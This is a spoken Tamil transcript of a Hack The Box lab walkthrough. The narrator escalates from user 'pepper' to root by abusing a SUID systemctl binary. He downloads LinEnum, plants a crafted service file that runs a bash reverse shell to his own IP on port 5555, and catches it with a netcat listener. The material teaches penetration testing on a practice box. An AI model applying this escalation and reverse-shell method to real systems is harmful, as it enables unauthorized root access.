இருக்கும். ஓகே, cd home பெப்பருக்குள்ளே போயிட்டு உள்ளே போய் பார்த்தோம்னா யூசர்னு இருக்கும். cat user.text உள்ளே பார்த்தோம்னா யூசரோட ஃப்ளாக் இருக்கும். ஓகே, இப்போ வந்து யூசர் ஃப்ளாக் எடுத்துட்டோம். அடுத்தது வந்து நெக்ஸ்ட் என்ன அப்படின்னு கேட்டிங்கன்னா ரூட்டை வந்து நம்ம எடுக்கணும். அதில் வந்து நீங்கள் என்ன பண்ணுவீங்க, ps-ax இதை போட்டோம்னா ps-aux இது போட்டு பார்த்தோம்னா நம்மளுக்கு தெரியும் உள்ளே வந்து என்னென்ன இதெல்லாம் வந்து ரன் ஆகுது அப்படின்ட்டு. இல்லைனா
PSP4 வந்து நம்ம போட்டு பார்க்கலாம். அதுவும் இல்லைன்னா அதுவும் போடலாம். இல்லைனா வந்து நம்ம லினக்ஸ் எனுமரேஷன் டூல்ஸ் எல்லாம் இருக்குது. அந்த ஷெல் ஸ்கிரிப்ட் வந்து நம்ம ஆல்ரெடி ஃபர்ஸ்ட் வீடியோவில் சொல்லியிருக்கேன்னு நினைக்கிறேன். அந்த ஸ்கிரிப்டெல்லாம் போட்டு நம்ம ரன் பண்ணி பார்த்தோம் அப்படின்னா நம்மளுக்கு வந்து உள்ளே வந்து எதுக்கெல்லாம் வந்து ப்ரிவிலேஜ் இருக்குது அப்படிங்கிறத நம்ம வந்து நார்மலாக வந்து கண்டுபிடிக்கலாம். இப்போ எப்படி சூடோ -l போட்டு நம்ம கண்டுபிடிச்சோம் உள்ளே வந்து இதுக்கு மட்டும் பர்மிஷன் இருக்குன்ட்டு, அதே மாதிரி தான் இது வந்து ஆட்டோமேட் பண்ணுறதுக்குன்னு ஒரு ஷெல் ஸ்கிரிப்ட் இருக்குது. சரிங்களா, அதை வந்து நம்ம இப்போ ரன் பண்ணுவோம். நான் டெம்புக்குள்ளே போய்க்கிறேன். ஃபஸ்ட்டு இந்த டெம்புக்கு பதிலாக நீங்கள் நிறையா ரைட்டப்ஸில் வந்து பார்த்தீங்கன்னா dev/shm ஒன்று இருக்கும், அதுக்குள்ளேயும் போய்ட்டு பண்ணலாம். அதுவும் வந்து என்னென்னா டெம்ப் ஃபோல்டர் மாதிரி தான் கைண்ட் ஆஃப். ஸோ அதனால் அதை பற்றி ஒன்றும் பிரச்சனை இல்லை. அதில் வந்து யாரோ ஆல்ரெடி 123.sh வச்சுருக்காங்க. என்ன வேணாம், நம்ம வந்து lin enum.sh இருக்கா, இந்த ஃபைலை வந்து நம்ம அங்கே எடுத்துக்குவோம். நான் என்னோட இந்த மிஷின் வந்து அப்பாச்சி சர்வர் வந்து நான் ஸ்டார்ட் பண்ணியிருக்கேன். ஸோ அந்த ஃபைலை மட்டும் நான் இங்கே டவுன்லோட் பண்ணிக்கிறேன். curl கமாண்டை யூஸ் பண்ணுறேன். curl http நம்ம மிஷினோட IP lin enum.sh கரெக்டாக கேஸை பார்த்துக்கணும். enum.sh போட்டு இதை கோடை க்ளோஸ் பண்ணிடுவோம். பண்ணிட்டோம் அப்படின்னா நம்மளுக்கு டவுன்லோட் ஆகும். டவுன்லோடு ஆகிடுச்சு. ஓகே, இப்போ lin enumக்கு நம்ம பர்மிஷன் கொடுத்துட்டோம். அடுத்தது lin enum.sh வந்து ரன் பண்ணுவோம். ரன் பண்ணோம் அப்படின்னாலே அதுவே உள்ளே இருக்கிற பர்மிஷன்ஸ் எல்லாத்தையும் எடுத்து நம்மளை பார்த்துரும். ஒவ்வொன்றுக்காக நம்ம போயிட்டு செக் பண்ணுன்ற அவசியமே கிடையாது. அது ரன் ஆகிறதுக்கு ஒரு நிமிஷத்துலேருந்து 2 நிமிஷம் வரைக்கும் ஆகும். அது வரை நம்ம வெயிட் பண்ணுவோம். ஓகே, ஓகே, ஸ்கேன் வந்து கம்ப்ளீட் ஆயிடுச்சு. ஃபர்ஸ்ட் நம்ம டாப்லேருந்து பார்ப்போம் எதுக்கெல்லாம் வேறு பர்மிஷன் இருக்குன்னு. ஆல்ரெடி நம்ம ஹேக் தி பாக்ஸ் பார்த்ததுலேருந்து உங்களுக்கு இந்த பர்மிஷன்ஸ்லாம் பார்க்குறதுக்கு உங்களுக்கு தெரிஞ்சிருக்கும் அப்படின்னு நான் நம்புகிறேன். இது வந்து நார்மலாக இருக்கிற ஃபைல்ஸ், ஹோஸ்ட் நேம், யூசர்ஸ் வந்து ரூட்டு, பெப்பரு, ஓகே, TTY, UID என்னென்ன யூசர்ஸ் இருக்காங்கன்னா அந்த PASSWD ஃபைல் இருக்குமா அந்த ஃபைல்ஸு, content of EDC, இதுதான் அந்த ஃபைலு. அடுத்தது சூப்பர் யூசர் அக்கௌண்ட் வந்து ரூட்டு, ஆர் பர்மிஷன்ஸ், ஹோம் டைரக்டரிக்கு வந்து எதெல்லாம் பர்மிஷன் இருக்குன்ட்டு லாஸ்ட் மிஷின் கிபானா வச்சு நம்ம பார்க்குறப்ப அதில் நான் காமிச்சிருப்பேன். எதுக்கெல்லாம் வந்து ஹோம் டைரக்டரியில் பர்மிஷன் இருக்குன்னு grep கமாண்ட் போட்டு எடுத்திருப்போம். அதை வச்சு நம்ம வந்து உள்ள எதுக்கெல்லாம் வந்து பர்மிஷன் இருக்குங்கிற யூசர் வந்து நம்ம கெஸ் பண்ணலாம் அப்படின்ட்டு. அதே தான் வந்து இதுலேயும். சரிங்களா, இந்த மெத்தடை தான் வந்து அதுலேயும் இந்த கோடுக்கு பின்னாடி, அந்த மெத்தடை தான் இந்த கோடுக்கு பின்னாடி யூஸ் பண்ணியிருப்பாங்க. லாங்குவேஜ் என்விரான்மெண்ட்டு, யூசர் பெப்பர், ஓகே, இதெல்லாம் வேணாம். அடுத்தது வேறு ஏதாவது க்ரான் ஜாப்ஸ் எல்லாமே ரூட்டுக்கு மட்டும்தான் இருக்குது. நெக்ஸ்ட்டு இதெல்லாம் நெட்வொர்க்ஸ், இதெல்லாம் நம்ம நார்மலாக போட்டாலே வரும், PS-AX கமாண்டு. அடுத்தது பைனரி பர்மிஷன்ஸு, இதுலேயும் எல்லாத்துக்கும் ரூட்டில் தான் இருக்குது. வேறு இதில் பெப்பர் இருக்கான்னு பார்ப்போம். இங்கே பாருங்களேன், நெட்கேட்டு இது எல்லாமே இருக்குது. நெட்கேட்டு, கேலு, GCC, WGET, ஓகே. இதில் பெப்பர் இந்த சிஸ்டம் யூட்டிலிட்டிஸ் CTL, ஓகே. இதில் வந்து ரெண்டுமே யூசரில் மட்டும்தான் ரன் ஆகும். ஓகே, இங்கே ஒன்று இருக்குது பார்த்தீங்களா, SUID ஃபைல்ஸு. இதில் வந்து என்னென்னா ஒரு இதில் வந்து பெப்பர்லேருந்து ரூட் ஆக்சிஸ்க்கு நம்மளுக்கு வந்து ஆக்சிஸ் இருக்குது. அதாவது பின்னு ஃபைலுக்குள்ளே சிஸ்டம் CTL அப்படின்ற ஃபைலு. அதை போய்ட்டு நம்ம உள்ள செக் பண்ணி பார்த்துருவோம்.
cd bin அதில் போயிட்டு எல்எஸ் கொடுத்து பார்த்தோம்னா நேரம் எக்கச்சக்கமான ஃபைல்ஸ் வரும். அதில் போய்ட்டு எல்எஸ் பண்ணலே இதில் கொடுத்து பார்த்தோம் அப்படின்னா சிஸ்டம் சிடிஎல் இருக்கா. இந்த சிஸ்டம் சிடிஎலுக்கு நம்மளுக்கு வந்து ரூட்டுக்கான பர்மிஷன் இருக்குது. ஸோ இது மூலமாக நம்மளால் ப்ரிவிலேஜ் எஸ்கலேஷன் பண்ண முடியும். சிஸ்டம் சிடிஎலை யூஸ் பண்ணி உங்களுக்கு ப்ரிவிலேஜ் எஸ்கலேஷன் பண்ணுறது எப்படின்ட்டு கூகுள் பண்ணிங்கனாலே உங்களுக்கு வந்து கிடச்சிரும். ப்ரிவிலேஜ் எஸ்கலேஷன் ஆல்ரெடி நான் சர்ச் பண்ணேன், அது நம்மளுக்கு அந்த ஆப்ஷன் இதில் வந்திருக்கு. இந்த பொதுவாக அந்த சிஸ்டம் சிடிஎல் அப்படிங்கிறது வந்து என்ன அப்படின்னா சர்வீசஸ் எல்லாம் வந்து ஆட்டோமேட்டிக்காக நம்மளுக்கு ஸ்டார்ட் பண்ணுறதுக்காக இந்த ஆப்ஷன் வந்து யூஸ் பண்ணுறாங்க. அதோட வரலாறு வந்து நீங்கள் படித்து பார்த்தீங்கனாலே உங்களுக்கு தெரியும். அதுக்குன்னு ஒரு சில சின்டாக்ஸ் இருக்குது. அந்த சின்டாக்ஸில் போட்டுட்டு .service அப்படின்ற அந்த ஃபைல் வந்து நம்ம சேவ் பண்ணிட்டோம் அப்படின்னா நம்ம எப்போல்லாம் என்ன சொல்கிறோமோ அந்த நேரத்துக்கு வந்து ரீஸ்டார்ட் ஆகிறது, ஒரு குறிப்பிட்ட கமாண்ட் எக்ஸிக்யூட் பண்ணுறது, ஒரு குறிப்பிட்ட சர்வீஸை வந்து ஸ்டார்ட் பண்ணுறது, ஸ்டாப் பண்ணுறது, இந்த மாதிரி ஆப்ஷன்ஸ் எல்லாமே அதெல்லாம் பண்ண முடியும். சரிங்களா? ஸோ அந்த ஃபைலை வந்து நம்ம எப்படி பண்ணலாம் அப்படிங்கிறத இங்கே வந்து அவங்களுக்கு வந்து எக்ஸ்பிளைன் பண்ணியிருப்பாங்க. இது இந்த மாதிரி மீடியம் பிளாக்ஸ்லாம் நிறையா நீங்கள் படிச்சிங்கனாலே உங்களுக்கு தெரியும். இதில் வந்து எக்ஸ்பிளைன் பண்ணியிருப்பாங்க அதெல்லாம் வந்து எப்படி யூஸ் பண்ணலாம் அப்படின்ட்டு. அந்த சிஸ்டம் சிடிஎல் வந்து நீங்கள் வந்து அதை ஆக்சஸ் பண்ணுறதுக்கான கமாண்ட்ஸ் ஃபஸ்ட்டு என்ன அப்படின்னா சிஸ்டம் சிடிஎல் ஸ்டார்ட்டு, அதுக்கப்புறமேட்டு அந்த அப்ளிகேஷன் ஃபைல், அந்த சர்வீஸ் ஃபைல் டாட் சர்வீஸ் அதை கொடுத்து நீங்கள் வந்து அதை ரன் பண்ணி ரன் பண்ணிக்கலாம். சரி, இன்னும் வேறு அதோட சின்டாக்ஸ் வந்து இன்னும் உங்களுக்கு வேணும் அப்படின்னா வச்சுக்கோங்களேன். இது வந்து அன்ப்ரிவிலேஜ்டு. ப்ரிவிலேஜ் ஏதோ GTFO பின்ஸ்னு இருக்கா. இதில் பார்த்தீங்கன்னாலே உங்களுக்கு தெரியும். ஃபஸ்ட்டாக வந்திருக்கும். இதில் வந்து சொல்லியிருப்பாங்க எதெல்லாம் நம்மளுக்கு வந்து எக்ஸிக்யூட் பண்ணணும். இங்கே வந்து எக்ஸிக் ஸ்டார்ட் அப்படின்னு இருக்கா. அதில் போய்ட்டு இந்த ஈக்குவல் கொடுத்துட்டு நம்ம எந்த பாத்து கொடுக்குறோமோ அந்த பாத்தெல்லாம் வந்து நம்மளுக்கு எக்ஸிக்யூட் பண்ணணும். இதுமாதிரி நிறையா இருக்குது. இதில் வந்து நான் ஒரு சாம்பிள் மட்டும் எடுத்து வச்சுருக்கேன். அதை தான் வந்து நான் இப்போ இந்த வீடியோவில் வந்து நான் டெமோ பண்ண போகிறேன். என்னோடய சர்வரில் வந்து நான் இங்கே வச்சுருக்கேன்னா எல்எஸ் பண்ணி வச்சுருக்கேன். ஆல்ரெடி இது எல்லாமே நான் வந்து லோட் பண்ணி வச்சுட்டேன். அதனால் நம்ம திருப்பி நம்ம அது பண்ணணுன்ற இது இல்லை. lol.service இது வந்து பார்த்தோம் அப்படின்னா நம்மளுக்கு வந்து இங்கே நெட்கேட் ஷெல்ல வந்து நம்மளுக்கு எக்ஸிக்யூட் பண்ணுற மாதிரி சொல்லியிருக்கு. சரிங்களா? இங்கே வந்து டிஸ்கிரிப்ஷன் இருக்குது. இந்த டிஸ்கிரிப்ஷனில் வந்து நீங்கள் வந்து என்ன வேணால் டிஸ்கிரிப்ஷன் வச்சுக்கலாம். அது வந்து ஜஸ்ட் நம்மளுக்கு புரியறதுக்காக. ரூட் ஷெல் டைப் வந்து ஃபோர்க்கிங் இந்த மாதிரி நம்ம என்ன வேணுமோ வச்சுக்கலாம். சரிங்களா? இந்த இடத்துல நீங்கள் வந்து என்ன பண்ணலான்னா நார்மலாக இந்த மாதிரி நெட்கேட் கமாண்டும் கொடுக்கலாம். இல்லை அப்படின்னா ஒரு குறிப்பிட்ட டைரக்டரியில் இருக்கிற ஃபைல்ஸ் வந்து எக்ஸிக்யூட் பண்ண, அதாவது ரிவர்ஸ் கனெக்ஷன் இருக்கிற ஃபைல் வந்து எக்ஸிக்யூட் பண்ண அப்படின்னு சொல்லிட்டோம்னா அதையும் வந்து நம்மளுக்கு எக்ஸிக்யூட் பண்ணி கொடுத்துரும். நான் வந்து என்ன சொல்லியிருக்கேன், எக்ஸிக்யூட் வந்து ஸ்டார்ட் பண்ணுறது வந்து ஹோமில் பெப்பர் இந்த யூசருக்குள்ள tour.shன்னு இருக்கா, இதை வந்து நீ ஸ்டார்ட் பண்ண அப்படின்னு சொல்கிறேன் சொல்லி நான் அந்த கமெண்ட் வந்து நான் சேவ் பண்ணி வச்சுக்கிறேன். சரி, அப்போ வந்து அது ஸ்டார்ட் பண்ணுறதுக்கு முன்னாடி நம்ம என்ன பண்ணணும்னா அந்த tour.shன்ற நேமில் நம்மளுக்கு வந்து உள்ள ரிவர்ஷல் இருக்கணும். சரிங்களா? இப்போ இருந்தால் மட்டும்தான் நம்மளால் பண்ண முடியும். ஸோ அதுக்கு உண்டான ஒரு பேஷ் ஷெல்லு ஒன்று நான் எடுத்து வச்சுக்கிறேன். உள்ளே பார்த்தீங்கன்னா sh.shன்னு வச்சுருக்கேன்னா இது வந்து நான் ரீநேம் பண்ணிக்கிறேன். காப்பி tour.sh ஓகே. நானும் அதில் போயிட்டு நம்ம மிஷினோட ஐபி இதெல்லாமே நான் லாஸ்ட் டைமே ஒர்க் பண்ணி பார்த்தது. இந்த ஃபைல்ஸ் எல்லாம் மிஷினோட ஐபி ஒவ்வொரு வாட்டி இந்த ஐபியை ஞாபகமாக வச்சுக்கிறது எனக்கு பெரிய வேலையாக இருக்குது. 5555 ஓகேவா, இதோட இருந்துக்கிட்டோம். வெயிட், இதே ஐபி தானே அது? ஆமாம், இது தெரியாமல் வேறு நான் ஓப்பன் பண்ணி யூஸ் பண்ணிட்டுருக்கேன். ஓகே, இப்போ வந்து இந்த ரெண்டு ஃபைல்ஸையும் வந்து நம்ம உள்ளே வந்து ட்ரான்ஸ்ஃபர் பண்ணுவோம். ஒன்று வந்து lol.service, அதுக்கப்புறமேட்டு tour.sh ஓகேவா. எங்கே போகிறேன் அப்படின்னா இப்போ pwd
பின்னுக்குள்ளே இருக்கோமா, அங்கே இருக்கக்கூடாது. ஹோம்குள்ளே போயிட்டு பெப்பரில் உள்ள போயிட்டோம்னா இந்த யூசரில் தான் இருக்கும். அதுக்கு முன்னாடி நம்ம என்ன பண்ணணும்னா இங்கே வந்து இந்த நெட்கேட் இது வச்சுருந்தோமா, லிசனர் வந்து நம்ம ஸ்டார்ட் பண்ணி விட்டணும் ரிவர்ஷல் வரதுக்கு முன்னாடி. 5555 வந்து நான் லிசன் பண்ண வச்சுட்டேன். அதுக்கப்புறமேட்டு இப்போ curl-o http .10.10.14.125 அதானே, சரி 130 14.130. அடுத்தது tour.sh வந்து நான் ஃபஸ்ட்டு டவுன்லோட் பண்ணிக்கிறேன். ஓகே, அடுத்தது curl-o .14.130 lol.service அதை நான் டவுன்லோட் பண்ணிடுறேன். ஓகே, lol.service வந்து நம்ம வச்சுருக்கோமா, வச்சுட்டு இப்போ ஃபஸ்ட்டு நம்ம என்ன பண்ணணும்னா இந்த சர்வீஸ் வந்து நம்ம எப்படி எக்ஸிக்யூட் பண்ணணும் அப்படின்னா அதுக்குன்னு ஒரு சில மெத்தட் இருக்குது. அதை ரன் பண்ணுறதுக்கு அது வந்து சிஸ்டம் சிடிஎல்லுக்காக தானே, ஆட்டோமேஷனுக்காக தானே பண்ணியிருக்கோம். ஸோ அது மூலமாக தான் நம்ம அதை வந்து ரன் பண்ணணும். சிஸ்டம் சிடிஎல் போயிட்டு அது ஃபஸ்ட்டு என்ன பண்ணால் லிங்க் கொடுக்கணும். ஃபஸ்ட்டு அந்த ஃபைல் வந்து அந்த சிஸ்டம் ஃபைல் வந்து எங்கே இருக்குது, அதாவது நம்ம அந்த சர்வீஸ் ஃபைல் வச்சுருக்கோம்ல அந்த ஃபைல் வந்து எங்கே இருக்குது அப்படிங்கிறத நம்ம அதுக்கான லிங்க்கை நம்ம கொடுத்தணும். லிங்க்கை கொடுத்தோன்னே அது சிம் லிங்க் வந்து க்ரியேட் பண்ணிவிட்டு அதுக்கப்புறமா நம்ம வந்து நார்மலாக வந்து எக்ஸிக்யூட் பண்ண முடியும். பெப்பர் அதுக்குள்ளே lol.service அப்படின்னு இருக்கா, இதை கொடுத்துரும். அப்படின்னா நம்மளுக்கு என்ன ஆகும்னா ஃபஸ்ட்டு வந்து லிங்க் வந்து சிம் லிங்க் வந்து க்ரியேட் ஆயிரும். சரிங்களா, இப்போ க்ரியேட் ஆனதுக்கப்புறமேட்டு இந்த ஃபைல் வந்து நம்மளால் வந்து எக்ஸிக்யூட் பண்ண முடியும். சிஸ்டம் சிடிஎல் ஸ்டார்ட் லோல் அப்படின்னு கொடுத்தோம்னாலே நம்மளுக்கு வந்து சர்வீஸ் வந்து நம்மளுக்கு எக்ஸிக்யூட் ஆகும். இப்போ இந்த சர்வீஸ் வந்து என்ன ஆகும்னா ரூட் யூஸராக ரன் ஆகும். ஏன்னா நம்ம அந்த ஒரு குரூப்பில் தானே பார்த்தோம், நம்மளுக்கு வந்து பெப்பர்லேருந்து ரூட் யூஸருக்கு போகும். நம்மளுக்கு வந்து இங்கே ஷெல் வந்து எக்ஸிக்யூட் ஆகிடுச்சு. அதனால தான் அடுத்த பாப்பப் எதுவுமே வரல. இங்கே லிசனரை போய்ட்டு நம்ம செக் பண்ணிவிட்டு அங்கே பார்த்தோம்னா கனெக்ஷன் வந்துருக்கு, ஐடி கொடுத்தோம்னா வந்து ரூட் வந்திருக்கு. சரிங்களா, இது மூலமாக நம்மளுக்கு வந்து ரூட் யூஸர் வந்து எடுத்திருக்கோம். சரிங்களா, சிடி ரூட் எல்எஸ் கேட் root.txt இதை பார்த்தீங்க அப்படின்னா உங்களுக்கு வந்து ரூட்டு ஃப்ளாக் வந்துருச்சு. அவ்வளோதான், இந்த மிஷின் வந்து சிம்பிள். இந்த மாதிரி தான் வந்து நம்ம இந்த ப்ராப்ளத்தை வந்து சால்வ் பண்ணோம். இந்த மிஷின் வந்து பெருசாக ஒன்றும் கிடையாது. என்ன புதுசாக லேர்ன் பண்ணியிருப்போம் அப்படின்னா ஆஸ் யூஷுவல் எப்பொழுதும் பண்ணுற மாதிரி எனுமரேஷன் பண்ணோம். என்மேப்பை யூஸ் பண்ணி நம்ம வந்து உள்ள ஒரு எஸ்கியூஎல் இன்ஜெக்ஷன் மூலமாக நம்ம வந்து டைரெக்டாக வந்து எஸ்கியூஎல் இன்ஜெக்ஷனில் அப்லோட் பண்ணினோம். அப்லோட் பண்ணதுக்கப்புறமேட்டு ஷெல் ஆக்சஸ் எடுத்தோம். ஷெல்லேருந்து நம்ம www டேட்டா எடுத்தோம். அந்த யூசர்லேருந்து பெப்பர் யூசருக்கு நம்ம போனோம். எப்படின்னா நடுவில் simpler.py அப்படின்ற ஃபைல் வந்து நம்ம சோர்ஸ் கோட் வந்து ரிவ்யூ பண்ணோம். அதில் வந்து எப்படி நம்மளால் வந்து ஷெல் வந்து எக்ஸிக்யூட் பண்ண முடியும் அப்படின்ட்டு. ஏன் நம்மளால் அந்த இடத்துல என்மேப்பை போட முடியாதுன்ற ரீசனும் நான் சொல்லியிருந்தேன். சரிங்களா, அவ்வளோதான். அடுத்தது வந்து வேறு என்ன பண்ணோம் அப்படின்னா அந்த பெப்பர் யூசர்லேருந்து ரூட் யூசருக்கு போனால் நடுவில் என்ன பண்ணோம் அப்படின்னா லினக்ஸ் வந்து எனுமரேஷன் பண்ணோம். லின் என்னும் டூலை போட்டு நம்ம எனுமரேட் பண்ணோம். உள்ளே எந்தெந்த இதுக்குள்ள வந்து சர்வீஸில் ஆக்சஸ் இருக்குது அப்படிங்கிறத பார்த்தோம். சிஸ்டம் சிடிஎலுக்கு இருந்துச்சு. சிஸ்டம் சிடிஎலுக்கு எப்படி நம்ம ரூல் எழுதுறதுங்கிறத பார்த்துட்டு அதுலேருந்து நம்ம ரிவர்ஸ் கனெக்ஷன் எடுத்தோம். அவ்வளோதான், சிம்பிள். இந்த டோட்டல் மிஷினோட பேக் த்ரூவுமே இவ்வளோ தான். சரிங்களா, இன்னும் செயின்ஸ் அந்த மாதிரி நிறைய மிஷின்ஸ் இருக்குது. அதில் வந்து பஃபர் ஓவர்ஃப்ளோ இருக்குது. அதெல்லாம் கொஞ்சம் கஷ்டமாக இருக்கும் அப்படின்னா நானே அதில் பஃபர் ஓவர்ஃப்ளோஸில் நிறைய ப்ராக்டிஸ் பண்ணணும். ஏன்னா நம்ம இந்த வீடியோ எல்லாமே படிக்க தான் போட்டுட்ருக்கேன். சரிங்களா, அதனால தான் நான் அந்த மிஷின்ஸ்லாம் இன்னும் கான்சென்ட்ரேட் பண்ணல. இது வரைக்கும் ஈஸியானது இன்டர்மீடியட் மட்டும்தான் இப்போ பார்த்துட்டு இருக்கோம். அடுத்த லெவலில் அடுத்த மிஷின்ஸ் நம்ம எதிர்பார்க்கலாம்.
ஓகேங்களா? எனிவே இந்த வீடியோ உங்களுக்கு புரிஞ்சிருக்கும் நம்புறேன். பிடிச்சிருந்தா லைக் பண்ணுங்க, பிடிக்கலன்னா டிஸ்லைக் பண்ணுங்க. இந்த வீடியோ எப்படி இருந்துச்சுன்னு கமெண்ட் பண்ணுங்க. தேங்க்ஸ் ஃபார் வாட்சிங்.